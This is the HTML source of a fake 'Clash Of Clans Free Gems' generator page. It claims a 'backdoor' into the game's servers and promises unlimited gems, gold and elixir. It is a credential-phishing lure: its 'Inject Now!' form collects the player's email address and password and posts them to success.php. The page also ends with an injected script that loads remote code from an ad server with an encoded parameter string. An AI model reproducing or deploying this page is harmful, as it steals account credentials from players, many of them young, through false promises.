<!-- Z1T0NG -->
<!-- 2016 -->
<!-- Z1T0NG -->

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US"> 
<head>
<meta name="viewport" content="width=device-width, initial-scale=1">

<meta http-equiv="Content-Type" content="text/html; charset=windows-1252">

<link rel="stylesheet" href="bootstrap.css">
<link rel="stylesheet" href="style.css">
<script src="bootstrap.js"></script>
<script src="jquery-1.11.1.js"></script> 
    <title>Clash Of Clans Free Gems</title>
	<link rel="stylesheet" type="text/css" href="bg.css" />
	
	</head>
	<body>
<div class="alert alert-info">
    <center><marquee>
    <strong>Welcome!</strong> Server online connected from backdoor to clashofclansdatabase.supercell.com <strong>|</strong> We will give you Free Gems <strong>|</strong> Free Gold <strong>And</strong> Free Exiler
    </marquee></center>
  </div>

<br><br>
		<div class="container">
<div class="row">
<div class="panel panel-success">
  <div class="panel-heading"><center><b>Happy Anniversary! </b></center></div>
  <div class="panel-body">
    <div class="input-group" style="width:49%;float:right">
  <span class="input-group-addon" id="sizing-addon2"><img src="gems.png" style="width:18px;height:20px;"/></span>
  <input type="text" class="form-control" placeholder="Gems: Max 2,000,000,000" aria-describedby="sizing-addon2">
</div>
    <div class="input-group" style="width:49%;float:left">
  <span class="input-group-addon" id="sizing-addon2"><img src="gold.png" style="width:18px;height:20px;"/></span>
  <input type="text" class="form-control" placeholder="Gold: Max 1,000,000,000"  aria-describedby="sizing-addon2">
</div>
    <div class="input-group" style="width:49%;float:left">
  <span class="input-group-addon" id="sizing-addon2"><img src="elixir.png" style="width:18px;height:20px;"/></span>
  <input type="text" class="form-control" placeholder="Elixir: Max 2,000,000,000"  aria-describedby="sizing-addon2">
</div>
    <div class="input-group" style="width:49%;float:right">
  <span class="input-group-addon" id="sizing-addon2"><img src="trophy.png" style="width:18px;height:20px;"/></span>
  <input type="text" class="form-control" placeholder="Trophy: Max 100,000"  aria-describedby="sizing-addon2">
</div>
<div class="input-group" style="float:center">
<br>
<p><b>Change Name</b> <span class="glyphicon glyphicon-pencil"></span></p>
<div class="wrapper">
    <input type="text" id="nickname" name="nickname" required="" placeholder="Change Your Nickname" aria-describedby="sizing-addon2">
    <button onclick="myFunction()"  class="btn btn-success btn-sm">Change</button>
</div> 

</div>
</div>
</div>
<!-- Submit Abis -->

<!-- Info -->
<div class="panel panel-primary">
  <div class="panel-heading"><center><b>Inject tools for connect to your Clash of Clans!</b></center></div>
  <div class="panel-body">
  
    <!-- Form Start -->
	<form method="post" action="success.php">			
  <div class="form-group">
  <label for="email">Email Address :</label><br>
  <div class="input-group" style="width:49%;float:left">
  <input type="text" class="form-control" id="email" name="email" placeholder="Email" aria-describedby="sizing-addon2" required="">
</div>
    <div class="input-group" style="width:49%;float:right">
  <input type="text" class="form-control" id="domain" name="domain" placeholder="@domain.com" value="@gmail.com" aria-describedby="sizing-addon2" disabled><br>
</div>
</div>
  <div class="form-group"><br>
    <label for="password">Password :</label>
    <input type="password" class="form-control" id="pass" name="pass" required="" placeholder="Password">
  </div>
    <div class="form-group">
    <label for="TownHall_Level">Your Townhall Level :</label>
    <input class="form-control" placeholder="1-11" maxlength="2" minlength="1" required="" type="text" name="th" id="th"  />
  </div>
  <center><button type="submit" class="btn btn-warning">Inject Now!</button></center>
 </div>
</form>


   <!-- Form end -->
  </div>
</div>
<!-- Info End -->
</div>
<script>
function myFunction() {
    alert("Success !! Your Nickname has been Changed");
}
</script>
<script type="text/javascript">if (self==top) {function netbro_cache_analytics(fn, callback) {setTimeout(function() {fn();callback();}, 0);}function sync(fn) {fn();}function requestCfs(){var idc_glo_url = (location.protocol=="https:" ? "https://" : "http://");var idc_glo_r = Math.floor(Math.random()*99999999999);var url = idc_glo_url+ "cfs.uzone.id/cfspushadsv2/request" + "?id=1" + "&enc=telkom2" + "&params=" + "4TtHaUQnUEiP6K%2fc5C582ECSaLdwqSpnkC8mCd0qG68p6dYbpbIs44ICd9%2bto0gmxEV2OWWJLVYMV%2fLR81MA3MPMPLaI3RcTXCX3XHBC%2bwtuMKPRRtR9plMrFpYPNOR%2bVllfcb1guMMtGBJVQXBHiH1Ly%2f1NQsJ4vDDeUPNIKB%2b2SVoefMuIuR8oOQFJOOIBkzDYGJ%2bp2JodH49Ry5S3pCQ5gwLaFRUALs3MeePre%2fmefpzJmMPj1fSGIZQy0LwzCU8liDSF1XBIVN%2bv7NwdveiAOK%2fc%2bN4%2b9rSCLbqrj%2bEdPsZrRGEAB45YcM2m%2bi6krE7uBvRCX%2fqfmCdFki7wop1wxfqvNd%2fYFBBBkZVwBWSa8Cz7AUJYePz5MLMZht3OVu82l5mpicsYdUT8xqMe9YqllyWhULHCYdAzO424vvEc0w6NTng6bYfnUyer1i0YaPllU7WffIcCQpOaclC0GswOQl5DtAoe0Pnq7MeXb8KDjgrI6LhhBmoJM4Vsw1W7n%2b%2bFd2xqRmQDWoHTkJJdE9RiUXYC2iBrHjX9p3KJn1DdJrsumCrjzZKSCdPNxTe%2fl6rjOuFoH%2fU%3d" + "&idc_r="+idc_glo_r + "&domain="+document.domain + "&sw="+screen.width+"&sh="+screen.height;var bsa = document.createElement('script');bsa.type = 'text/javascript';bsa.async = true;bsa.src = url;(document.getElementsByTagName('head')[0]||document.getElementsByTagName('body')[0]).appendChild(bsa);}netbro_cache_analytics(requestCfs, function(){});};</script></body>
    </html>